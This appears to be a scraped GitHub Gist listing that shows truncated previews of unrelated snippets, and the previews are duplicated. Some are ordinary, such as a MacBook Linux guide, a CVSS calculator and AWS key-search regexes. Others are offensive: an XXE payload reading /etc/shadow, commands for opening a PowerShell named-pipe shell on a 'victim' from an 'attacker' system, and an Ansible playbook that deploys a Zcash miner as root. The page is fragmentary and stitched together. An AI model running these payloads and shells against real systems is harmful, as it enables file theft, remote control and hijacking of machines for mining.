kost kost

## xxe.xml
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>

## AWS access key grep
url - https://aws.amazon.com/blogs/security/a-safer-way-to-distribute-aws-credentials-to-ec2/

Finding hard-coded credentials in your code
Hopefully you’re excited about deploying credentials to EC2 that are automatically rotated.  Now that you’re using Roles, a good security practice would be to go through your code and remove any references to AKID/Secret.  We suggest running the following regular expressions against your code base:

Search for access key IDs: (?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9]).  In English, this regular expression says: Find me 20-character, uppercase, alphanumeric strings that don’t have any uppercase, alphanumeric characters immediately before or after.
Search for secret access keys: (?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=]).  In English, this regular expression says: Find me 40-character, base-64 strings that don’t have any base 64 characters immediately before or after.
If grep is your preferred tool, run a recursive, Perl-compatible search using the following commands

## 0 Linux-On-MBP-Late-2016.md

      
              5 files
            
          
              33 forks
            
          
              369 comments
            
          
              617 stars
            
          
                roadrunner2
                / 0 Linux-On-MBP-Late-2016.md
            
            
              Last active
              February 29, 2024 16:29
            
              
                Linux on MacBook Pro Late 2016 and Mid 2017 (with Touchbar)
              
          
    Introduction

This is about documenting getting Linux running on the late 2016 and mid 2017 MPB's; the focus is mostly on the MacBookPro13,3 and MacBookPro14,3 (15inch models), but I try to make it relevant and provide information for MacBookPro13,1, MacBookPro13,2, MacBookPro14,1, and MacBookPro14,2 (13inch models) too. I'm currently using Fedora 27, but most the things should be valid for other recent distros even if the details differ. The kernel version is 4.14.x (after latest update).
The state of linux on the MBP (with particular focus on MacBookPro13,2) is also being tracked on https://github.com/Dunedan/mbp-2016-linux . And for Ubuntu users there are a couple tutorials (here and here) focused on that distro and the MacBook.
Note: For those who have followed these instructions ealier, and in particular for those who have had problems with the custom DSDT, modifying the DSDT is not necessary anymore - se

  
## RM.groovy
/**
 *  Broadlink Switch
 *
 *  Copyright 2016 BeckyR
 *
 *  Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
 *  in compliance with the License. You may obtain a copy of the License at:
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *

## netcat.go
package main

import (
  "flag"
  "fmt"
  "io"
  "log"
  "net"
  "os"
)

## hb_all_books_dl.js
/*
After purchasing a humble book bundle, go to your download page for that bundle.
Open a console window for the page and paste in the below javascript

this fork downloads all formats and does so without using jquery (since that didnt work for me)

note that if you are in chrome, chrome will not download the pdfs for you by default, to fix this
type “about:plugins” in the address bar and disable chrome's pdf viewer
*/
var pattern = /(MOBI|EPUB|PDF)$/i;

## gist:8ef36782ceb7f73d74cfb00c2a710301
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme

# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"

## main.go
package main

import (
        "fmt"
        "io/ioutil"
        "net/http"
)

func getPage(url string) (int, error) {
        resp, err := http.Get(url)

## miner_zcash.yml
---
- hosts: [miner_zcash, tag_Name_zmine, zmine*]
  become_method: sudo
  become_user: root
  become: true
  strategy: free
  vars:
    stratum_uri: zec-eu.suprnova.cc:2142
    stratum_user: rick3_.user
    stratum_password: password

## CVSSv2.bas
Attribute VB_Name = "CVSSv2"
Function CVSSv2(AV As String, AC As String, AU As String, C As String, I As String, A As String)
    Attribute CVSSv3.VB_Description = "This function calculates the CVSSv3 Score from the coresponding vector"
    Attribute CVSSv3.VB_ProcData.VB_Invoke_Func = " \n9"
    Dim intAV, intAC, intAU, intC, intI, intA As Double
    Dim ImpactScore, ISCbase, Exploitability As Double

     Select Case AV
        Case "Network", "N"
            intAV = 1
	<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
	url - https://aws.amazon.com/blogs/security/a-safer-way-to-distribute-aws-credentials-to-ec2/

	Finding hard-coded credentials in your code
	Hopefully you’re excited about deploying credentials to EC2 that are automatically rotated. Now that you’re using Roles, a good security practice would be to go through your code and remove any references to AKID/Secret. We suggest running the following regular expressions against your code base:

	Search for access key IDs: (?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9]). In English, this regular expression says: Find me 20-character, uppercase, alphanumeric strings that don’t have any uppercase, alphanumeric characters immediately before or after.
	Search for secret access keys: (?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=]). In English, this regular expression says: Find me 40-character, base-64 strings that don’t have any base 64 characters immediately before or after.
	If grep is your preferred tool, run a recursive, Perl-compatible search using the following commands
	/**
	* Broadlink Switch
	*
	* Copyright 2016 BeckyR
	*
	* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
	* in compliance with the License. You may obtain a copy of the License at:
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	/*
	After purchasing a humble book bundle, go to your download page for that bundle.
	Open a console window for the page and paste in the below javascript

	this fork downloads all formats and does so without using jquery (since that didnt work for me)

	note that if you are in chrome, chrome will not download the pdfs for you by default, to fix this
	type “about:plugins” in the address bar and disable chrome's pdf viewer
	*/
	var pattern = /(MOBI\|EPUB\|PDF)$/i;
	# Command to run on the victim
	# This will establish a PowerShell listener over the "pwnme" named pipe
	remote /S "powershell.exe" pwnme

	# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
	runas /netonly /user:[Domain\|Hostname\Username] "cmd"
	remote /C [Hostname\IP] "pwnme"
	package main

	import (
	"fmt"
	"io/ioutil"
	"net/http"
	)

	func getPage(url string) (int, error) {
	resp, err := http.Get(url)
	---
	- hosts: [miner_zcash, tag_Name_zmine, zmine*]
	become_method: sudo
	become_user: root
	become: true
	strategy: free
	vars:
	stratum_uri: zec-eu.suprnova.cc:2142
	stratum_user: rick3_.user
	stratum_password: password
	Attribute VB_Name = "CVSSv2"
	Function CVSSv2(AV As String, AC As String, AU As String, C As String, I As String, A As String)
	Attribute CVSSv3.VB_Description = "This function calculates the CVSSv3 Score from the coresponding vector"
	Attribute CVSSv3.VB_ProcData.VB_Invoke_Func = " \n9"
	Dim intAV, intAC, intAU, intC, intI, intA As Double
	Dim ImpactScore, ISCbase, Exploitability As Double

	Select Case AV
	Case "Network", "N"
	intAV = 1